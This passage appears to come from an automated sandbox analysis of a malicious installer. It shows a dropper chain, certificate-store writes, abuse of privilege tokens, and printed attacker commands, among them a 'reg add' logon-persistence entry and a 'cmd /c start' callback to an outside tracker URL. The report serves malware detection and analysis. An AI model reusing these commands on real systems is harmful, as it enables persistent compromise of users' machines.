007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7620 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 245 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 251 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 83 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 86 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 127 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 128 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 129 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 240 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4376 Setup (15).exe 4376 Setup (15).exe 560 otzsmoqMuE4r6jpG6RBaDWdA.exe 560 otzsmoqMuE4r6jpG6RBaDWdA.exe 428 RjFgmagbQ7RmhF0K1UglrkFw.exe 428 RjFgmagbQ7RmhF0K1UglrkFw.exe 3208 WerFault.exe 3208 WerFault.exe 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3120 Process not Found -
Suspicious behavior: MapViewOfSection 54 IoCs
pid Process 560 otzsmoqMuE4r6jpG6RBaDWdA.exe 4000 0obLAuwqU13NotahfdOa_8R4.exe 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 4540 explorer.exe 4540 explorer.exe 3120 Process not Found 3120 Process not Found 4540 explorer.exe 4540 explorer.exe 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe 4540 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 2680 1497320.exe 4584 6779625.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe Token: SeRestorePrivilege 3208 WerFault.exe Token: SeBackupPrivilege 3208 WerFault.exe Token: SeBackupPrivilege 3208 WerFault.exe Token: SeDebugPrivilege 4100 4763924.exe Token: SeDebugPrivilege 2672 0M9wjfQFH63XI9hgboJPz8Zt.exe Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeCreateTokenPrivilege 2364 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 2364 askinstall53.exe Token: SeLockMemoryPrivilege 2364 askinstall53.exe Token: SeIncreaseQuotaPrivilege 2364 askinstall53.exe Token: SeMachineAccountPrivilege 2364 askinstall53.exe Token: SeTcbPrivilege 2364 askinstall53.exe Token: SeSecurityPrivilege 2364 askinstall53.exe Token: SeTakeOwnershipPrivilege 2364 askinstall53.exe Token: SeLoadDriverPrivilege 2364 askinstall53.exe Token: SeSystemProfilePrivilege 2364 askinstall53.exe Token: SeSystemtimePrivilege 2364 askinstall53.exe Token: SeProfSingleProcessPrivilege 2364 askinstall53.exe Token: SeIncBasePriorityPrivilege 2364 askinstall53.exe Token: SeCreatePagefilePrivilege 2364 askinstall53.exe Token: SeCreatePermanentPrivilege 2364 askinstall53.exe Token: SeBackupPrivilege 2364 askinstall53.exe Token: SeRestorePrivilege 2364 askinstall53.exe Token: SeShutdownPrivilege 2364 askinstall53.exe Token: SeDebugPrivilege 2364 askinstall53.exe Token: SeAuditPrivilege 2364 askinstall53.exe Token: SeSystemEnvironmentPrivilege 2364 askinstall53.exe Token: SeChangeNotifyPrivilege 2364 askinstall53.exe Token: SeRemoteShutdownPrivilege 2364 askinstall53.exe Token: SeUndockPrivilege 2364 askinstall53.exe Token: SeSyncAgentPrivilege 2364 askinstall53.exe Token: SeEnableDelegationPrivilege 2364 askinstall53.exe Token: SeManageVolumePrivilege 2364 askinstall53.exe Token: SeImpersonatePrivilege 2364 askinstall53.exe Token: SeCreateGlobalPrivilege 2364 askinstall53.exe Token: 31 2364 askinstall53.exe Token: 32 2364 askinstall53.exe Token: 33 2364 askinstall53.exe Token: 34 2364 askinstall53.exe Token: 35 2364 askinstall53.exe Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 3240 Cleaner Installation.exe 960 Inlog.tmp 4416 Conhost.exe 4828 VPN.tmp 4580 Setup.exe 6328 0wDpgt8PgMXWHUFAs91rCeA4.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 7940 Esplorarne.exe.com 7332 Esplorarne.exe.com 7332 Esplorarne.exe.com 7332 Esplorarne.exe.com 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 7332 Esplorarne.exe.com 7332 Esplorarne.exe.com 7332 Esplorarne.exe.com 6620 Esplorarne.exe.com 6620 Esplorarne.exe.com 6620 Esplorarne.exe.com 7920 Esplorarne.exe.com 7920 Esplorarne.exe.com 7920 Esplorarne.exe.com 6664 Esplorarne.exe.com 6664 Esplorarne.exe.com 6664 Esplorarne.exe.com 3572 Esplorarne.exe.com 3572 Esplorarne.exe.com 3572 Esplorarne.exe.com 4608 Esplorarne.exe.com 4608 Esplorarne.exe.com 4608 Esplorarne.exe.com 6216 Esplorarne.exe.com 6216 Esplorarne.exe.com 6216 Esplorarne.exe.com 7420 Esplorarne.exe.com 7420 Esplorarne.exe.com 7420 Esplorarne.exe.com 6500 Esplorarne.exe.com 6500 Esplorarne.exe.com 6500 Esplorarne.exe.com 7548 Esplorarne.exe.com 7548 Esplorarne.exe.com 7548 Esplorarne.exe.com 3428 Esplorarne.exe.com 3428 Esplorarne.exe.com 3428 Esplorarne.exe.com 6516 anyname.exe 6516 anyname.exe 6516 anyname.exe 7096 Esplorarne.exe.com 7096 Esplorarne.exe.com 7096 Esplorarne.exe.com 7236 msedge.exe 7236 msedge.exe 7236 msedge.exe 2640 Esplorarne.exe.com 2640 Esplorarne.exe.com 2640 Esplorarne.exe.com 1728 msedge.exe 1728 msedge.exe 1728 msedge.exe 7812 Esplorarne.exe.com 7812 Esplorarne.exe.com 7812 Esplorarne.exe.com 7840 Esplorarne.exe.com 7840 Esplorarne.exe.com 7840 Esplorarne.exe.com 5168 Esplorarne.exe.com 5168 Esplorarne.exe.com 5168 Esplorarne.exe.com 1500 Esplorarne.exe.com 1500 Esplorarne.exe.com 1500 Esplorarne.exe.com 1308 Esplorarne.exe.com 1308 Esplorarne.exe.com 1308 Esplorarne.exe.com 3432 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5956 9A1.exe 8032 cmd.exe 5992 MaskVPNUpdate.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3120 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4376 wrote to memory of 2160 4376 Setup (15).exe 96 PID 4376 wrote to memory of 2160 4376 Setup (15).exe 96 PID 4376 wrote to memory of 2160 4376 Setup (15).exe 96 PID 4376 wrote to memory of 2284 4376 Setup (15).exe 100 PID 4376 wrote to memory of 2284 4376 Setup (15).exe 100 PID 4376 wrote to memory of 2284 4376 Setup (15).exe 100 PID 4376 wrote to memory of 2360 4376 Setup (15).exe 99 PID 4376 wrote to memory of 2360 4376 Setup (15).exe 99 PID 4376 wrote to memory of 2360 4376 Setup (15).exe 99 PID 4376 wrote to memory of 2584 4376 Setup (15).exe 98 PID 4376 wrote to memory of 2584 4376 Setup (15).exe 98 PID 4376 wrote to memory of 3096 4376 Setup (15).exe 105 PID 4376 wrote to memory of 3096 4376 Setup (15).exe 105 PID 4376 wrote to memory of 3096 4376 Setup (15).exe 105 PID 4376 wrote to memory of 2672 4376 Setup (15).exe 102 PID 4376 wrote to memory of 2672 4376 Setup (15).exe 102 PID 4376 wrote to memory of 2672 4376 Setup (15).exe 102 PID 4376 wrote to memory of 2692 4376 Setup (15).exe 101 PID 4376 wrote to memory of 2692 4376 Setup (15).exe 101 PID 4376 wrote to memory of 2692 4376 Setup (15).exe 101 PID 4376 wrote to memory of 4176 4376 Setup (15).exe 107 PID 4376 wrote to memory of 4176 4376 Setup (15).exe 107 PID 4376 wrote to memory of 4176 4376 Setup (15).exe 107 PID 4176 wrote to memory of 1392 4176 JApsGa7I8I72qAXcYO9Sp3Qv.exe 108 PID 4176 wrote to memory of 1392 4176 JApsGa7I8I72qAXcYO9Sp3Qv.exe 108 PID 4176 wrote to memory of 1392 4176 JApsGa7I8I72qAXcYO9Sp3Qv.exe 108 PID 2284 wrote to memory of 4280 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 109 PID 2284 wrote to memory of 4280 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 109 PID 2284 wrote to memory of 4280 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 109 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 588 wrote to memory of 2692 588 WerFault.exe 144 PID 588 wrote to memory of 2692 588 WerFault.exe 144 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 3096 wrote to memory of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 868 wrote to memory of 2360 868 WerFault.exe 149 PID 868 wrote to memory of 2360 868 WerFault.exe 149 PID 2584 wrote to memory of 4100 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 114 PID 2584 wrote to memory of 4100 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 114 PID 2584 wrote to memory of 2680 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 117 PID 2584 wrote to memory of 2680 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 117 PID 2584 wrote to memory of 2680 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 117 PID 2584 wrote to memory of 4692 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 118 PID 2584 wrote to memory of 4692 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 118 PID 2584 wrote to memory of 4692 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 118 PID 2584 wrote to memory of 2288 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 120 PID 2584 wrote to memory of 2288 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 120 PID 2584 wrote to memory of 2288 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 120 PID 2284 wrote to memory of 3200 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 121 PID 2284 wrote to memory of 3200 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 121 PID 2284 wrote to memory of 3200 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 121 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2160 wrote to memory of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 1392 wrote to memory of 4304 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 122 PID 1392 wrote to memory of 4304 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 122 PID 1392 wrote to memory of 4304 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\Documents\NNW24mGiB9tvUdj42kbS7jLA.exe"C:\Users\Admin\Documents\NNW24mGiB9tvUdj42kbS7jLA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\Documents\NNW24mGiB9tvUdj42kbS7jLA.exeC:\Users\Admin\Documents\NNW24mGiB9tvUdj42kbS7jLA.exe3⤵
- Executes dropped EXE
PID:4204
-
-
-
C:\Users\Admin\Documents\X2BVdpzqm8arwIRWOLp7W9Ak.exe"C:\Users\Admin\Documents\X2BVdpzqm8arwIRWOLp7W9Ak.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Admin\AppData\Roaming\4763924.exe"C:\Users\Admin\AppData\Roaming\4763924.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4100 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4100 -s 23604⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6564
-
-
-
C:\Users\Admin\AppData\Roaming\4013451.exe"C:\Users\Admin\AppData\Roaming\4013451.exe"3⤵
- Executes dropped EXE
PID:2680 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4672
-
-
-
C:\Users\Admin\AppData\Roaming\3734520.exe"C:\Users\Admin\AppData\Roaming\3734520.exe"3⤵
- Executes dropped EXE
PID:4692
-
-
C:\Users\Admin\AppData\Roaming\6133418.exe"C:\Users\Admin\AppData\Roaming\6133418.exe"3⤵
- Executes dropped EXE
PID:2288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 24524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 24524⤵
- Program crash
PID:7368
-
-
-
-
C:\Users\Admin\Documents\qIr_pSnhMcbIt_5Oe8fiED0b.exe"C:\Users\Admin\Documents\qIr_pSnhMcbIt_5Oe8fiED0b.exe"2⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 3123⤵
- Program crash
PID:428
-
-
-
C:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exe"C:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exeC:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exe3⤵
- Executes dropped EXE
PID:4280
-
-
C:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exeC:\Users\Admin\Documents\j4fvu8qxD0jNBtzYWKC45T7j.exe3⤵
- Executes dropped EXE
PID:3200
-
-
-
C:\Users\Admin\Documents\wrTFb1lhLEs2z2B2ytNKb8tu.exe"C:\Users\Admin\Documents\wrTFb1lhLEs2z2B2ytNKb8tu.exe"2⤵
- Executes dropped EXE
PID:2692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 2963⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
-
C:\Users\Admin\Documents\0M9wjfQFH63XI9hgboJPz8Zt.exe"C:\Users\Admin\Documents\0M9wjfQFH63XI9hgboJPz8Zt.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Users\Admin\Documents\otzsmoqMuE4r6jpG6RBaDWdA.exe"C:\Users\Admin\Documents\otzsmoqMuE4r6jpG6RBaDWdA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\Documents\otzsmoqMuE4r6jpG6RBaDWdA.exe"C:\Users\Admin\Documents\otzsmoqMuE4r6jpG6RBaDWdA.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:560
-
-
-
C:\Users\Admin\Documents\JApsGa7I8I72qAXcYO9Sp3Qv.exe"C:\Users\Admin\Documents\JApsGa7I8I72qAXcYO9Sp3Qv.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\is-V14EO.tmp\JApsGa7I8I72qAXcYO9Sp3Qv.tmp"C:\Users\Admin\AppData\Local\Temp\is-V14EO.tmp\JApsGa7I8I72qAXcYO9Sp3Qv.tmp" /SL5="$300A8,138429,56832,C:\Users\Admin\Documents\JApsGa7I8I72qAXcYO9Sp3Qv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\is-73AP0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-73AP0.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4304 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:3828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 2966⤵
- Program crash
PID:2812
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\is-646PU.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-646PU.tmp\Inlog.tmp" /SL5="$102A0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:960 -
C:\Users\Admin\AppData\Local\Temp\is-O1SEV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-O1SEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\is-9GDT3.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9GDT3.tmp\Setup.tmp" /SL5="$304BE,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-O1SEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:7940
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-77996.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:4856
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-77996.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:7020
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:6136
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:4856
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
PID:7532
-
-
C:\Users\Admin\AppData\Local\Temp\is-77996.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-77996.tmp\{app}\vdi_compiler"9⤵PID:1368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 29210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8172
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:1324
-
